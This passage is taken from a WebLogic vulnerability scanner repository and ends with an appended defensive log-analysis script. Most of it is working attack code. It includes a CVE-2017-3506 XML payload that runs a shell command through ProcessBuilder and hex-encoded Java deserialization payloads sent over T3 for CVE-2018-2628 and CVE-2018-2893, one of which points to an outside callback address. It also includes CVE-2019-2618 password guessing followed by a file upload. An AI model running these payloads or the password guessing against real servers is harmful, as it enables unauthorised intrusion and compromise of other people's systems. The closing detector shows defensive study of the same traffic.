p=re.findall(VER_SIG[index], res, re.S) 57 | if len(p)>0: 58 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 59 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 60 | print(Color.OKGREEN+'[+]CVE-2017-3248 漏洞存在'+Color.ENDC) 61 | else: 62 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 63 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 64 | 65 | def run(self,ip,port,index): 66 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 67 | sock.settimeout(5) 68 | server_addr = (ip, port) 69 | self.t3handshake(sock,server_addr) 70 | self.buildT3RequestObject(sock,port) 71 | rs=self.sendEvilObjData(sock,PAYLOAD[index]) 72 | self.checkVul(rs,index) 73 | -------------------------------------------------------------------------------- /app/plugins/CVE-2017-3506.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import sys 5 | import requests 6 | import re 7 | import logging 8 | 9 | from ..platform import ManageProcessor,Color 10 | 11 | logging.basicConfig(filename='Weblogic.log', 12 | format='%(asctime)s %(message)s', 13 | filemode="w", level=logging.INFO) 14 | 15 | VUL=['CVE-2017-3506'] 16 | headers = {'user-agent': 'ceshi/0.0.1','content-type': 'text/xml'} 17 | 18 | poc_str = ''' 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | /bin/bash 27 | 28 | 29 | -c 30 | 31 | 32 | whoami 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | ''' 43 | 44 | 45 | @ManageProcessor.plugin_register('CVE20173506') 46 | class CVE20173506(object): 47 | def process(self,ip,port): 48 | self.run(ip,port,0) 49 | 50 | def poc(self,url,index): 51 | if not url.startswith("http"): 52 | url = "http://" + url 53 | if "/" in url: 54 | url += '/wls-wsat/CoordinatorPortType' 55 | 56 | try: 57 | response = requests.post(url, 
data=poc_str, verify=False, timeout=5, headers=headers) 58 | response = response.text 59 | response = re.search(r"\.*\<\/faultstring\>", response).group(0) 60 | except Exception: 61 | response = "" 62 | 63 | if 'java.lang.ProcessBuilder' in response or "0" in response: 64 | logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])) 65 | print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC) 66 | print(Color.OKGREEN+'[+]CVE-2017-3506 漏洞存在'+Color.ENDC) 67 | else: 68 | logging.info('[-]Target weblogic not detected {}'.format(VUL[index])) 69 | print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC) 70 | 71 | 72 | def run(self,rip,rport,index): 73 | url=rip+':'+str(rport) 74 | self.poc(url=url,index=index) 75 | -------------------------------------------------------------------------------- /app/plugins/CVE-2018-2628.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # _*_ coding:utf-8 _*_ 3 | 4 | import socket 5 | import sys 6 | import time 7 | import re 8 | import logging 9 | 10 | from ..platform import ManageProcessor,Color 11 | 12 | logging.basicConfig(filename='Weblogic.log', 13 | format='%(asctime)s %(message)s', 14 | filemode="w", level=logging.INFO) 15 | 16 | 17 | VUL=['CVE-2018-2628'] 18 | 
PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']
VER_SIG=['\\$Proxy[0-9]+']


@ManageProcessor.plugin_register('CVE20182628')
class CVE20182628(object):
    def process(self,ip,port):
        self.run(ip,port,0)

    def t3handshake(self,sock,server_addr):
        sock.connect(server_addr)
        # T3 handshake header: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        time.sleep(1)
        sock.recv(1024)

    def buildT3RequestObject(self,sock,port):
        data1 = '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'
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(bytes.fromhex(d))
        time.sleep(2)


    def sendEvilObjData(self,sock,data):
        payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        # Prefix the message with its total length (4-byte big-endian, counting the prefix itself)
        payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
        sock.send(bytes.fromhex(payload))
        time.sleep(2)
        sock.send(bytes.fromhex(payload))
        res = ''
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # peer closed the connection; stop instead of looping forever
                    break
                res += chunk.decode('utf-8','ignore')
                time.sleep(0.1)
        except Exception:
            pass
        return res

    def checkVul(self,res,index):
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC)
            print(Color.OKGREEN+'[+]CVE-2018-2628 漏洞存在'+Color.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC)

    def run(self,ip,port,index):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(15)
        server_addr = (ip, port)
        self.t3handshake(sock,server_addr)
        self.buildT3RequestObject(sock,port)
        rs=self.sendEvilObjData(sock,PAYLOAD[index])
        self.checkVul(rs,index)

--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2893.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_

import socket
import time
import re
import sys
import logging

from ..platform import ManageProcessor,Color


logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
VUL='CVE-2018-2893'
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
VER_SIG=['StreamMessageImpl']


@ManageProcessor.plugin_register('CVE20182893')
class CVE20182893(object):
    def process(self,ip,port):
        self.run(ip,port,0)

    def t3handshake(self,sock,server_addr):
        sock.connect(server_addr)
        # T3 handshake header: "t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"
        sock.send(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'))
        #print(bytes.fromhex('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a').decode('utf-8').encode())
        time.sleep(1)
        res = sock.recv(1024)
        #print(res)
        #print('handshake successful')

    def buildT3RequestObject(self,sock,port):
        data1 = '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'
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port))
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(bytes.fromhex(d))
        time.sleep(2)
        #print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))


    def sendEvilObjData(self,sock,data):
        payload='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'
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        #print('%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload))
        # Prefix the message with its total length (4-byte big-endian, counting the prefix itself)
        payload = '%s%s'%('{:08x}'.format(len(payload)//2 + 4),payload)
        sock.send(bytes.fromhex(payload))
        time.sleep(2)
        sock.send(bytes.fromhex(payload))
        #res2 = sock.recv(4096)
        #time.sleep(2)
        #print('res2: -------')
        #print(res2)
        res = ''
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # peer closed the connection; stop instead of looping forever
                    break
                res += chunk.decode('utf-8','ignore')
                time.sleep(0.1)
        except Exception:
            pass
        #print('res+: ---',res)
        return res

    def checkVul(self,res,index):
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL))
            print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL)+Color.ENDC)
            print(Color.OKGREEN+'[+]CVE-2018-2893 漏洞存在'+Color.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL))
            print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL)+Color.ENDC)

    def run(self,ip,port,index):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        server_addr = (ip, port)
        self.t3handshake(sock,server_addr)
        self.buildT3RequestObject(sock,port)
        rs=self.sendEvilObjData(sock,PAYLOAD[index])
        self.checkVul(rs,index)

--------------------------------------------------------------------------------
/app/plugins/CVE-2018-2894.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# _*_ coding:utf-8 _*_

import requests
import re
import logging


from ..platform import ManageProcessor,Color

logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

VUL=['CVE-2018-2894']
headers = {'user-agent': 'ceshi/0.0.1'}

@ManageProcessor.plugin_register('CVE20182894')
class CVE20182894(object):
    def process(self,ip,port):
        self.run(ip,port,0)

    def islive(self,ur,port):
        url='http://' + str(ur)+':'+str(port)+'/ws_utc/resources/setting/options/general'
        r = requests.get(url, headers=headers)
        return r.status_code

    def run(self,url,port,index):
        # Any status other than 404 on the ws_utc settings page is reported as a hit
        if self.islive(url,port)!=404:
            logging.info('[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index]))
            print(Color.OKBLUE+'[+]The target weblogic has a JAVA deserialization vulnerability:{}'.format(VUL[index])+Color.ENDC)
            print(Color.OKGREEN+'[+]CVE-2018-2894 漏洞存在'+Color.ENDC)
        else:
            logging.info('[-]Target weblogic not detected {}'.format(VUL[index]))
            print(Color.FAIL+'[-]Target weblogic not detected {}'.format(VUL[index])+Color.ENDC)

--------------------------------------------------------------------------------
/app/plugins/CVE-2019-2618.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# _*_ coding:utf-8 _*_

import requests
import sys, re
import traceback

from ..platform import ManageProcessor,Color

# This vulnerable endpoint only allows 5 password attempts before it keeps failing, so the check is of limited use and depends partly on luck.
passwd = ['weblogic','weblogic1','weblogic10','weblogic123','Oracle@123']

@ManageProcessor.plugin_register('CVE20192618')
class CVE20192618(object):
    def process(self,ip,port):
        self.run(ip,port)
    def check(self,url):
        vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
        payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"11.tmp\"\r\nContent-Type: text/html\r\n\r\n 12341234 \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--"
        success = False
        for password in passwd:
            headers = {
                'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
                "username":"weblogic",
                "password":password,
                'wl_request_type': "app_upload",
                'wl_upload_application_name': "/",
                'archive': "true",
            }
            try:
                req = requests.post(url=vuln_url, data=payload,headers=headers)
                if "DeploymentService" not in req.text and req.status_code == 200 and '11.tmp' in req.text:
                    serverName = re.findall('/servers/(.*?)/upload/', req.text, re.S)[0]
                    print(Color.OKBLUE+"[+]口令爆破成功:weblogic/" + password+Color.ENDC)
                    print(Color.OKBLUE+"[+]weblogic服务名:" + serverName+Color.ENDC)
                    path = self.get_path(serverName)
                    print(Color.OKBLUE+"[+]8位随机字符目录:" + path+Color.ENDC)
                    #print(Color.GREEN+"[+]CVE-2019-2618漏洞存在"+Color.ENDC)
                    self.testupload(url,password,path)
                    success = True
                    print(Color.OKGREEN+"[+]CVE-2019-2618 漏洞存在"+Color.ENDC)
                    break
                else:
                    print(Color.FAIL+"[-]口令爆破失败:weblogic/" + password+Color.ENDC)
                    pass
            except Exception:
                #print("[-]口令请求异常:weblogic/" + password)
                traceback.print_exc()
                pass
        if True != success:
            print(Color.FAIL+"[-]target Weblogic is not Vul CVE-2019-2618"+Color.ENDC)


    def testupload(self,url,password,path):
        vuln_url = url + "/bea_wls_deployment_internal/DeploymentService"
        headers = {
            'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryPZVT5lymen1556Ma",
            "username":"weblogic",
            "password":password,
            'wl_request_type': "app_upload",
            'wl_upload_application_name': "..",
            'archive': "true",
        }
        shell = "21232f297a57a5a743894a0e4a801fc3"
        payload = "------WebKitFormBoundaryPZVT5lymen1556Ma\r\nContent-Disposition: form-data; name=\"file\"; filename=\"/tmp/_WL_internal/bea_wls_deployment_internal/{0}/war/test.tmp\"\r\nContent-Type: text/html\r\n\r\n {1} \r\n\r\n------WebKitFormBoundaryPZVT5lymen1556Ma--".format(path,shell)
        upload_path = url + "/bea_wls_deployment_internal/test.tmp"
        try:
            req = requests.post(url=vuln_url, data=payload,headers=headers)
            req = requests.get(upload_path)
            if req.status_code == 200:
                print(Color.OKBLUE+"[+]上传文件成功: " + upload_path+Color.ENDC)
        except Exception:
            print(Color.FAIL+"[-]上传文件失败....."+Color.ENDC)

    # The code below computes the 8-character random directory name of the WebLogic service
    def convert_n_bytes(self,n, b):
        bits = b * 8
        return (n + 2 ** (bits - 1)) % 2 ** bits - 2 ** (bits - 1)

    def convert_4_bytes(self,n):
        return self.convert_n_bytes(n, 4)

    def getHashCode(self,s):
        h = 0
        n = len(s)
        for i, c in enumerate(s):
            h = h + ord(c) * 31 ** (n - 1 - i)
        return self.convert_4_bytes(h)

    def toString(self,strs,radix):
        i = int(strs)
        digits = [
            '0' , '1' , '2' , '3' , '4' , '5' ,
            '6' , '7' , '8' , '9' , 'a' , 'b' ,
            'c' , 'd' , 'e' , 'f' , 'g' , 'h' ,
            'i' , 'j' , 'k' , 'l' , 'm' , 'n' ,
            'o' , 'p' , 'q' , 'r' , 's' , 't' ,
            'u' , 'v' , 'w' , 'x' , 'y' , 'z'
        ]
        buf = list(range(65))
        charPos = 64
        negative = int(strs) < 0
        if not negative:
            i = -int(strs)

        while (i<=-radix):
            buf[int(charPos)] = digits[int(-(i%radix))]
            charPos = charPos - 1
            i = int(i / radix)
        buf[charPos] = digits[int(-i)]
        if negative:
            charPos = charPos - 1
            buf[charPos] = '-'
        return (buf[charPos:charPos+65-charPos])

    def get_path(self,serverName):
        strings = "%s_%s_%s" % (serverName,"bea_wls_deployment_internal","bea_wls_deployment_internal.war")
        return "".join(self.toString(self.getHashCode(strings),36)).replace("-","")

    def run(self,ip,port):
        url = 'http://'+str(ip)+':'+str(port)
        self.check(url)

--------------------------------------------------------------------------------
/app/plugins/WeblogicConsole.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# _*_ coding:utf-8 _*_

import logging
import sys
import requests

from ..platform import ManageProcessor,Color

logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)

url = "http://192.168.3.32:7001/"


@ManageProcessor.plugin_register('weblogic-console')
class WeblogicCosole(object):
    headers = {'user-agent': 'ceshi/0.0.1'}
    def process(self,ip,port):
        self.run(ip,port)
    def islive(self,ur,port):
        url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp'
        r = requests.get(url, headers=self.headers)
        return r.status_code

    def run(self,url,port):
        if self.islive(url,port)==200:
            u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp'
            logging.info("[+]The target Weblogic console address is exposed! The path is: {} Please try weak password blasting!".format(u))
            print(Color.OKBLUE+"[+]The target Weblogic console address is exposed!\n[+]The path is: {}\n[+]Please try weak password blasting!".format(u)+Color.ENDC)
            print(Color.OKGREEN+'[+]Weblogic后台路径存在'+Color.ENDC)
        else:
            logging.info('[-]Target Weblogic console address not found!')
            print(Color.FAIL+"[-]Target Weblogic console address not found!"+Color.ENDC)

--------------------------------------------------------------------------------
/app/plugins/__init__.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# _*_ coding:utf-8 _*_

__all__ = ['WeblogicConsole','CVE-2014-4210','CVE-2019-2725','CVE-2019-2729','CVE-2017-10271','CVE-2017-3506','CVE-2019-2618','CVE-2018-2894','CVE-2018-2628','CVE-2018-2893','CVE-2016-0638','CVE-2016-3510','CVE-2017-3248',]
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
requests

--------------------------------------------------------------------------------
/weblogicscan.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/dr0op/WeblogicScan/6d01c0bdb3cfeee959c74a342014206dbf9bf6f3/weblogicscan.png
--------------------------------------------------------------------------------
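
Added example, not part of the WeblogicScan repository: a log check a defender can run to spot the HTTP requests the plugins above send. The request paths, the `ceshi/0.0.1` User-Agent and the five-entry password list come from the plugin code; the combined log format, the function names, the verdict labels and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Paths requested by the HTTP plugins in this repository (taken from the code above).
PROBE_PATHS = {
    "/console/login/LoginForm.jsp": "console-probe",
    "/ws_utc/resources/setting/options/general": "CVE-2018-2894-probe",
    "/bea_wls_deployment_internal/DeploymentService": "CVE-2019-2618-upload",
    "/bea_wls_deployment_internal/test.tmp": "CVE-2019-2618-verify",
}
SCANNER_UA = "ceshi/0.0.1"  # hard-coded in the console and CVE-2018-2894 plugins
PASSWORD_LIST_LEN = 5       # the CVE-2019-2618 plugin tries at most five passwords

# Assumption: the front end writes Apache/nginx "combined" access-log lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["path"] = rec.pop("target").split("?", 1)[0]  # ignore any query string
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines):
    """Map each client IP that touched a probe path to (verdict, sorted tags)."""
    state = defaultdict(lambda: {"tags": set(), "deploy_posts": 0, "served": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        tag = PROBE_PATHS.get(rec["path"])
        if rec["ua"] == SCANNER_UA:
            state[rec["ip"]]["tags"].add("scanner-user-agent")
        if tag is None:
            continue
        entry = state[rec["ip"]]
        entry["tags"].add(tag)
        if tag == "CVE-2019-2618-upload" and rec["method"] == "POST":
            entry["deploy_posts"] += 1
        if tag == "CVE-2019-2618-verify" and rec["status"] == 200:
            entry["served"] = True  # the uploaded test file was fetched successfully

    report = {}
    for ip, entry in state.items():
        if entry["served"]:
            verdict = "upload-served"        # highest priority: a file write succeeded
        elif entry["deploy_posts"] >= PASSWORD_LIST_LEN:
            verdict = "password-guessing"    # whole password list was tried
        else:
            verdict = "probe"
        report[ip] = (verdict, sorted(entry["tags"]))
    return report


# Constructed sample lines (documentation address ranges, invented sizes and status codes).
_TS = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {_TS} "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3500 "-" "ceshi/0.0.1"',
    f'192.0.2.10 - - {_TS} "GET /ws_utc/resources/setting/options/general HTTP/1.1" 404 1164 "-" "ceshi/0.0.1"',
] + [
    f'192.0.2.10 - - {_TS} "POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1" 401 0 "-" "python-requests/2.31.0"'
] * 5 + [
    f'198.51.100.7 - - {_TS} "POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1" 200 210 "-" "python-requests/2.31.0"',
    f'198.51.100.7 - - {_TS} "GET /bea_wls_deployment_internal/test.tmp HTTP/1.1" 200 34 "-" "python-requests/2.31.0"',
    f'203.0.113.5 - - {_TS} "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, (verdict, tags) in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, verdict, ", ".join(tags))
```

The T3 plugins (CVE-2018-2628, CVE-2018-2893) talk to the listener over a raw socket and leave no HTTP access-log entry, so they need network-level visibility rather than this check.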